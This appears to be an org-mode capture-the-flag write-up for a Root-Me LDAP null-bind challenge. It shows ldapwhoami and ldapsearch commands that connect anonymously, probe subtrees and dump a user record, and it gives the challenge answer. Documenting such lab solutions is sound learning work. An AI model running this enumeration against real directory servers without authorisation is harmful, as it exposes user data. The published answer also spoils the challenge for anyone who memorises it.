* LDAP null-bind challenge explained simply Think of LDAP like a big company phonebook/tree. Each node in the tree is a folder or a person record: #+begin_example dc=challenge01,dc=root-me,dc=org | +-- ou=anonymous | +-- uid=sabu +-- mail: sabu@anonops.org #+end_example In this challenge, the server allows *anonymous login* (called a null bind). That means we can connect without a username/password and ask some questions. ** What we did (step by step) 1) Checked if anonymous access works #+begin_src bash ldapwhoami -x -H ldap://challenge01.root-me.org:54013 #+end_src It returned `anonymous`, so null bind is enabled. 2) Tried to list everything from the main base DN #+begin_src bash ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)" #+end_src Server replied with `Insufficient access`. So: anonymous is allowed, but not everywhere. 3) Probed likely child branches under the base DN We tested candidate DNs and found one readable branch: #+begin_src bash ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn #+end_src That confirmed `ou=anonymous` exists and is accessible. 4) Enumerated that readable branch #+begin_src bash ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)" #+end_src This returned a user record: - `uid=sabu` - `mail: sabu@anonops.org` So the requested email is: *sabu@anonops.org* ** Why this works - LDAP permissions are often set per branch (subtree). - Root/base queries may be blocked. - A specific subtree can still be world-readable. - Enumeration is about finding *where* read access is allowed. ** Tiny mental model #+begin_example [Connect anonymously] --> [Test base DN] --blocked--> [Try child branches] | v [Find readable subtree] | v [Dump entries + get mail] #+end_example